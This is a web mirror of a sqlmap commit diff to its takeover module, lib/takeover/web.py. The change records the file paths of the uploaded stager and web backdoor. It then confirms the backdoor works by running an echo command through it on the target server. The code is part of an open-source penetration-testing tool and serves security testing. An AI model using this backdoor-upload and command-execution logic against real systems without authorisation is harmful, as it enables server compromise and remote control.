sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-26 11:33:47 +03:00
Code Issues Packages Projects Releases Wiki Activity

verify also that the web backdoor has been successfully uploaded

Browse Source
This commit is contained in:
Bernardo Damele 2012-07-11 14:08:51 +01:00
parent 6f6cd676b7
commit 0702dd70b5
1 changed files with 15 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
lib/takeover/web.py
View File

@ -45,7 +45,9 @@ class Web:
self.webApi = None self.webApi = None
self.webBaseUrl = None self.webBaseUrl = None
self.webBackdoorUrl = None self.webBackdoorUrl = None
self.webBackdoorFilePath = None
self.webStagerUrl = None self.webStagerUrl = None
self.webStagerFilePath = None
self.webDirectory = None self.webDirectory = None
def webBackdoorRunCmd(self, cmd): def webBackdoorRunCmd(self, cmd):
@ -215,11 +217,13 @@ class Web:
localPath = directory localPath = directory
uriPath = directory[2:] if isWindowsDriveLetterPath(directory) else directory uriPath = directory[2:] if isWindowsDriveLetterPath(directory) else directory
docRoot = docRoot[2:] if isWindowsDriveLetterPath(docRoot) else docRoot docRoot = docRoot[2:] if isWindowsDriveLetterPath(docRoot) else docRoot
if docRoot in uriPath: if docRoot in uriPath:
uriPath = uriPath.replace(docRoot, "/") uriPath = uriPath.replace(docRoot, "/")
uriPath = "/%s" % normalizePath(uriPath) uriPath = "/%s" % normalizePath(uriPath)
else: else:
webDir = extractRegexResult(r"//[^/]+?/(?P<result>.*)/.", conf.url) webDir = extractRegexResult(r"//[^/]+?/(?P<result>.*)/.", conf.url)
if webDir: if webDir:
uriPath = "/%s" % webDir uriPath = "/%s" % webDir
else: else:
@ -233,6 +237,7 @@ class Web:
self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath) self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath)
self.webStagerUrl = "%s/%s" % (self.webBaseUrl, stagerName) self.webStagerUrl = "%s/%s" % (self.webBaseUrl, stagerName)
self.webStagerFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, stagerName))).replace("//", "/").rstrip('/')
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
@ -244,6 +249,7 @@ class Web:
warnMsg += "on '%s'" % localPath warnMsg += "on '%s'" % localPath
logger.warn(warnMsg) logger.warn(warnMsg)
warned.add(localPath) warned.add(localPath)
continue continue
elif "<%" in uplPage or "<?" in uplPage: elif "<%" in uplPage or "<?" in uplPage:
@ -306,8 +312,16 @@ class Web:
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName) self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
self.webDirectory = localPath self.webDirectory = localPath
self.webBackdoorFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, backdoorName))).replace("//", "/").rstrip('/')
testStr = "command execution test"
output = self.webBackdoorRunCmd("echo %s" % testStr)
if testStr in output:
infoMsg = "the backdoor has been successfully "
else:
infoMsg = "the backdoor has probably been successfully " infoMsg = "the backdoor has probably been successfully "
infoMsg += "uploaded on '%s' - " % self.webDirectory infoMsg += "uploaded on '%s' - " % self.webDirectory
infoMsg += self.webBackdoorUrl infoMsg += self.webBackdoorUrl
logger.info(infoMsg) logger.info(infoMsg)